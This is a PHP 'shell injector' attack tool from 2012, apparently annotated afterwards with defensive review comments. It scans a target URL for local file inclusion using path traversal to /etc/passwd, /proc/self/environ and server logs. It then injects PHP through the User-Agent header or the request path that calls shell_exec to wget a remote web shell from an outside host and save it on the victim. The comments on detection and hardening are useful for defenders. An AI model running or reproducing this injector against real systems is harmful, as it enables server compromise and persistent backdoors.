Islam-Hacker

Shell injector

Dec 18th, 2012
  1. <?php
  2. /* ~~~~~~~~~~~~~~~~~~~
  3. Coded by ZiXeM\Ponyblaze
  4. ~~~~~~~~~~~~~~~~~~~~*/
  5.  
  // Review note: error_reporting(0) hides every warning and notice, so the failed
  // remote fetches and the reads of never-assigned variables later in this script
  // produce no visible output.
  6. error_reporting(0); ?>
  <!-- Review note: operator-side form for a local-file-inclusion (LFI) probing and
       payload-delivery script. It submits three GET parameters to p0ison3r_zixem.php:
       url (target base URL ending in the include parameter), shell (remote payload URL)
       and Go. For defenders, the pre-filled "shell" host and the script and file names
       on this page are indicators to search for in proxy, DNS and web-server logs. -->
  7. <html>
  8. <head>
  9. <style type='text/css'>
  10. body {
  11. background-color:#202020;
  12. color:White;
  13. }
  14. input {
  15. background-color:White;
  16. color:Black;
  17. border-color: Black;
  18. border-width: 2px;
  19. border-style: solid;
  20. }
  21.  
  22. .copyright {
  23.     background: -moz-linear-gradient(center bottom , #FFFFFF 0%, #000000 100%) repeat scroll 0 0 padding-box transparent;
  24.     border: 1px solid #28343F;
  25.     border-radius: 3px 3px 3px 3px;
  26.     box-shadow: 0 1px 2px #647384 inset;
  27. }
  28.  
  29. #down {
  30.     color: Blue;
  31.     font: italic 1em/30px Arial,Helvetica,sans-serif;
  32.     height: 20px;
  33.     margin: 30px auto 0;
  34.     min-width: 300px;
  35.     padding: 10px 0;
  36.     text-align: center;
  37.     width: 30%;
  38. }
  /* Review note: the 1px iframe and the .none class are used by the PHP further down
     (div class='none', textarea class='none', the iframe around the log URL) to render
     fetched responses effectively invisible on the page. */
  39. iframe {
  40. width: 1px;
  41. height: 1px;
  42. }
  43. .none {
  44. display:none;
  45. }
  46.  
  47. textarea {
  48. background-color:Black;
  49. Color:Cyan;
  50. }
  51.  
  52. .btn {
  53. color:Lime;
  54. background-color:Black;
  55. border-style: solid;
  56. border-color:White;
  57. border-width:2px;
  58. }
  59.  
  60. </style>
  61.  
  62. <title>APC-By Zixem.</title>
  63. </head>
  64. <body>
  65.  
  66. <center><a href='tools.php'><img src='http://3.bp.blogspot.com/--2rgY92F7SY/T10aCqEvzfI/AAAAAAAAiPc/uwNR2MLpmRE/s320/147092+-+artist+kloudmutt+badass+cigarette+Future_Twilight+twilight_sparkle.png' width='250' height='250' /></a><font color='#202020'>_____</font><br /><u><b><i>Shell injector.</i></b></u></center><p />
  67. <center>
  68. <form action='p0ison3r_zixem.php' name='form' method='get'>
  69. <code>
  70. <u>Ex. for vuln good links:</u><br/>
  71. <font color='Green'><b>http://www.site.com/index.php?page=</b></font> <br/>
  72. <u>Ex. for vuln bad links:</u><br/>
  73. <font color='Red'>http://www.site.com/index.php?page=<b><del>about.php</b></del></font><br /><p />
  74.  
  75. </code>
  76. Vuln link: . <td><input type='text' name='url' size='50' value='http://www.site.com/index.php?page=' />
  77. <br/>
  78. Shell link: <td><input type='text' name='shell' size='50' value='http://creyzistyle.tk/digi7al.txt' />
  79. <br />
  80. <input class='btn' type='submit' name='Go' value='Start.' />
  81. <p />
  82. ___________LOG____________
  83. <p />
  84. </form>
  85. <textarea cols='150' rows='20' readonly='readonly'>
  86. <?php
  87. // Variables part
  88.  
  89. /*
  90. Group file regex:
  91.  
  92. root:x:0:root
  93. bin:x:1:root,bin,daemon
  94. daemon:x:2:root,bin,daemon
  95. sys:x:3:root,bin,adm
  96. adm:x:4:root,adm,daemon
  97. tty:x:5:
  98.  
  99. */
  100.  
  // $url comes straight from the query string and is concatenated into every outbound
  // request below. The fetch on the next line runs on every page load, before the
  // http:// prefix check inside the Go branch, and $x404 is not referenced again in
  // this listing. NOTE(review): without that prefix a non-URL value would be opened
  // as a local path on the host running this script.
  101. $url=$_GET['url'];
  102. $x404=file_get_contents($url."ZiXeM.php");
  103.  
  // Paths appended to the target parameter to test whether it reads arbitrary files:
  // /etc/passwd, /etc/group and /proc/self/environ, bare and behind ../ runs.
  // Detection: parameter values containing these paths or long ../ sequences in
  // access logs or WAF events are a reliable sign of LFI probing.
  104. //$passwd= array("../../../../../../../../../../../../../etc/passwd","/etc/passwd","../etc/passwd","/etc/group","../../../../../../../../../../../etc/group","../../../../../../../../proc/self/environ","/proc/self/environ","../proc/self/environ");
  105. $passwd= array('../../../../../../../../../../../../../etc/passwd','/etc/passwd','../etc/passwd','/etc/group','../../../../../../../../../../../etc/group','../../../../../../../../proc/self/environ','/proc/self/environ','../proc/self/environ');
  106.  
  // Guessed locations of web-server access/error logs and httpd.conf.
  // Hardening: the PHP worker account should not be able to read server logs or
  // configuration; open_basedir and file permissions both help here.
  107. $logfiles= array("../apache/logs/error.log","../apache/logs/access.log","../../apache/logs/error.log","../../apache/logs/access.log","../../../apache/logs/error.log","../../../apache/logs/access.log","../../../../../../../etc/httpd/logs/acces_log","../../../../../../../etc/httpd/logs/acces.log","../../../../../../../etc/httpd/logs/error_log","../../../../../../../etc/httpd/logs/error.log","../../../../../../../var/www/logs/access_log","../../../../../../../var/www/logs/access.log","../../../../../../../usr/local/apache/logs/access_log","../../../../../../../usr/local/apache/logs/access.log","../../../../../../../var/log/apache/access_log","../../../../../../../var/log/apache2/access_log","../../../../../../../var/log/apache/access.log","../../../../../../../var/log/apache2/access.log","../../../../../../../var/log/access_log","../../../../../../../var/log/access.log","../../../../../../../var/www/logs/error_log","../../../../../../../var/www/logs/error.log","../../../../../../../usr/local/apache/logs/error_log","../../../../../../../usr/local/apache/logs/error.log","../../../../../../../var/log/apache/error_log","../../../../../../../var/log/apache2/error_log","../../../../../../../var/log/apache/error.log","../../../../../../../var/log/apache2/error.log","../../../../../../../var/log/error_log","../../../../../../../var/log/error.log","../../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf","/etc/httpd/conf/httpd.conf","/logs/access.log","/logs/error.log");
  // Seeded with a placeholder at index 0, so the first log URL recorded by the scan
  // lands at index 1, which is the element read later as $founded[1].
  108. $founded= array('ZiXeM');
  109.  
  // Main flow, run only when the form was submitted with Go=Start.:
  //   1. require an http:// prefix on both url and shell,
  //   2. request well-known files through the target parameter to test for local file inclusion,
  //   3. look for a web-server log that is readable the same way,
  //   4. send PHP source in a request header or request path so that it ends up in
  //      /proc/self/environ or a log file that the vulnerable include then evaluates.
  // Defensive takeaways: never build include/require paths from request data (use a fixed
  // allowlist), keep allow_url_include off, confine PHP with open_basedir, and deny the PHP
  // worker read access to server logs.
  110. if(isset($_GET['Go']) && $_GET['Go']=='Start.') {
  // Only the scheme prefix is checked; host and path are unrestricted, so anyone who can
  // reach this script can make its host issue arbitrary HTTP requests.
  111. if(!preg_match("/^http:\/\//",$_GET['url'])) {
  112. die("Enter url must be with http:// !\n");
  113. }
  114.  
  115. if(!preg_match("/^http:\/\//",$_GET['shell'])) {
  116. die("Enter shell url with http:// !\n");
  117. }
  118.  
  // NOTE(review): the url parameter is echoed unescaped into the page (inside the <textarea>).
  119. echo "Starting...\nTarget: {$_GET['url']}\n====================\n\n";
  // Each candidate path is requested three ways: with %00, with %0A and unmodified.
  // PHP rejects NUL bytes in filesystem paths since 5.3.4, so the %00 variant only
  // matters against older targets.
  // Detection: parameter values containing ../ runs, /etc/passwd, /etc/group,
  // /proc/self/environ, %00 or %0A.
  120. foreach($passwd as $checker) {
  121. $x=file_get_contents($url.$checker."%00");
  122. $x1=file_get_contents($url.$checker."%0A");
  123. $x2=file_get_contents($url.$checker);
  // The three flags are set from response content, not from which path was requested,
  // and are never initialised; the Available/Unavailable lines printed after the loop
  // are therefore only a rough indicator of what the target returned.
  124. if(preg_match("/bin:x:1:1:bin:\/bin:\/sbin\/nologin/",$x) || preg_match("/bin:x:1:1:bin:\/bin:\/sbin\/nologin/",$x1) || preg_match("/bin:x:1:1:bin:\/bin:\/sbin\/nologin/",$x2)) {
  125. $groupfile=TRUE;
  126. }
  127. if(preg_match("/DOCUMENT_ROOT=\//",$x) || preg_match("/DOCUMENT_ROOT=\//",$x1) || preg_match("/DOCUMENT_ROOT=\//",$x2)) {
  128. $environfile=TRUE;
  129. }
  130. if(preg_match("/bin:x:1:root,bin,daemon/",$x) || preg_match("/root:x:0:0:root:\/root:\/bin\/bash/",$x) || preg_match("/bin:x:1:root,bin,daemon/",$x1) || preg_match("/root:x:0:0:root:\/root:\/bin\/bash/",$x1) || preg_match("/bin:x:1:root,bin,daemon/",$x2) || preg_match("/root:x:0:0:root:\/root:\/bin\/bash/",$x2)) {
  131. $passwdfile=TRUE;
  132. }
  133. }
  134. if($groupfile==TRUE) { echo "[/etc/group] -> \tAvailable.\n"; } else { echo "[/etc/group] -> \tUnavailable.\n"; }
  135. if($passwdfile==TRUE) { echo "[/etc/passwd] -> \tAvailable.\n";} else { echo "[/etc/passwd] -> \tUnavailable.\n"; }
  136. if($environfile==TRUE) { echo "[/proc/self/environ] -> Available.\n";} else { echo "[/proc/self/environ] -> Unavailable.\n"; }
  137.  
  138. /*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ PART OF SCANNING THE LOG FILES ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
  139. // Word for Regex:   HTTP/1.1
  140.  
  // A response containing "HTTP/1.1" is taken as evidence that a log file was returned.
  // Detection: a short burst of requests cycling through the log-path guesses in $logfiles.
  141. foreach($logfiles as $logfile) {
  142. $y=file_get_contents($url.$logfile);
  143. if(preg_match("/HTTP\/1.1/i",$y)) {
  144. echo "[Log file]: ->\t".$url.$logfile."%00\n";
  145. $founded[]=$url.$logfile."%00";
  146. }
  147. else { $log_found=FALSE; }
  148. }
  // $log_found is only ever assigned FALSE (or left unset), so this branch effectively
  // depends on $environfile alone.
  149. if($log_found==FALSE && $environfile==TRUE) {
  150.  
  151.  echo "[Log file]: ->\tNot found.\n\nTrying /proc/self/environ method....\n";
  152.  
  // Three cURL requests for /proc/self/environ, each carrying PHP source in the
  // User-Agent header; that source calls shell_exec() to run wget against the
  // operator-supplied shell URL and save the result as 404ZIX.php.
  // Detection: a User-Agent (or any request header) containing "<?php" is a
  // high-fidelity signal; also watch for the web-server account spawning wget and for
  // a new file named 404ZIX.php appearing under the web root.
  // Hardening: disable shell_exec via disable_functions where it is not needed and
  // restrict outbound HTTP from web servers.
  153. $inject_num_2 = curl_init();
  154. curl_setopt($inject_num_2, CURLOPT_URL, $url."../../../../../../../../../proc/self/environ");
  155. curl_setopt($inject_num_2, CURLOPT_HEADER, 1);
  156. curl_setopt($inject_num_2, CURLOPT_USERAGENT, "<?php shell_exec('wget {$_GET['shell']} -O 404ZIX.php'); ?>");
  157. echo "</textarea>";
  158. echo "<div class='none'>";
  159. $final_exec=curl_exec($inject_num_2);
  160. echo "</div>";
  161. curl_close($inject_num_2);
  162. $inject_num_3 = curl_init();
  163. curl_setopt($inject_num_3, CURLOPT_URL, $url."../../../../../../../../../proc/self/environ%00");
  164. curl_setopt($inject_num_3, CURLOPT_HEADER, 1);
  165. curl_setopt($inject_num_3, CURLOPT_USERAGENT, "<?php shell_exec('wget {$_GET['shell']} -O 404ZIX.php'); ?>");
  166. echo "<div class='none'>";
  167. $final_exec3=curl_exec($inject_num_3);
  168. echo "</div>";
  169.  
  170. $inject_num_4 = curl_init();
  171. curl_setopt($inject_num_4, CURLOPT_URL, $url."/proc/self/environ%00");
  172. curl_setopt($inject_num_4, CURLOPT_HEADER, 1);
  173. curl_setopt($inject_num_4, CURLOPT_RETURNTRANSFER, 1);
  174. curl_setopt($inject_num_4, CURLOPT_USERAGENT, "<?php shell_exec('wget {$_GET['shell'] } -O 404ZIX.php'); ?>");
  175. echo "<div class='none'>";
  176. $final_exec4=curl_exec($inject_num_4);
  177. echo "</div>";
  178.  
  179. echo "<br />";
  180. //echo "<br /><textarea cols='50' rows='5'>";
  181. // close cURL resource, and free up system resources
  182. curl_close($inject_num_3);
  // The condition tests the cURL handles rather than the responses; the handles appear
  // truthy whenever curl_init() succeeded, so the "50%" message is printed regardless
  // of what the target returned and is not evidence of a compromise by itself.
  183. if($inject_num_2==TRUE || $inject_num_3==TRUE || $inject_num_4==TRUE) {
  184. die("<pre>[<font color='Lime'><b>+</b></font>] -> Chance the shell injected: [<font color='Red'><b>50%</font></b>]...the shell named 404ZIX.php\n<b>{$url}<font color='Red'>404ZIX.php</b></font>\n==============\nThanks for using ZiXeM's shell injector.</pre>");
  185.  }
  186. else { die("</div>Failed...sorry :S <div id='none'>"); flush(); ob_flush(); }
  187.  }
  // $logfile still holds the last path string from the scan loop, so this loose
  // comparison with TRUE passes whenever execution gets here.
  188.  if($logfile==TRUE) {
  189.  
  190.  
  191. //echo file_get_contents("{$url}/proc/self/environ");
  192. ?>
  193. <?php
  194. //$_SERVER['HTTP_USER_AGENT']="<h1>HeyThere</h1>";
  195. //echo "<iframe src='{$url}/proc/self/environ'></iframe>";
  196. //echo "</textarea>";
  // Log variant: PHP source is placed in the request path so that it is written to the
  // target's access log, then the first log URL recorded by the scan ($founded[1]) is
  // requested and embedded in the 1px iframe.
  // Detection: request URIs containing "<?php" or "shell_exec" in access logs.
  // NOTE(review): $founded[1] derives from the url parameter and is echoed into the
  // iframe src unescaped.
  197. file_get_contents($url."<?php shell_exec('wget {$_GET['shell']} -O 404ZIX.php'); ?>");
  198. file_get_contents($founded[1]);
  199. echo "<iframe src='{$founded[1]}'></iframe>";
  200. echo "<textarea class='none'>";
  201. }
  202. else { echo "/*~~~~~~~~~~~~*/\n[-] -> Sorry...shell uploading failed.\n================\nZiXeM.\n</textarea>";  }
  203. }
  204. ?>
  205. </textarea>
  206.  
  207. <div id='down' class='copyright'>Copyright 2012 ZiXeM from Team Digi<font color='Red'><b>7</b></font>al</b>
  208. </center>
  209. </body>
  210. </html>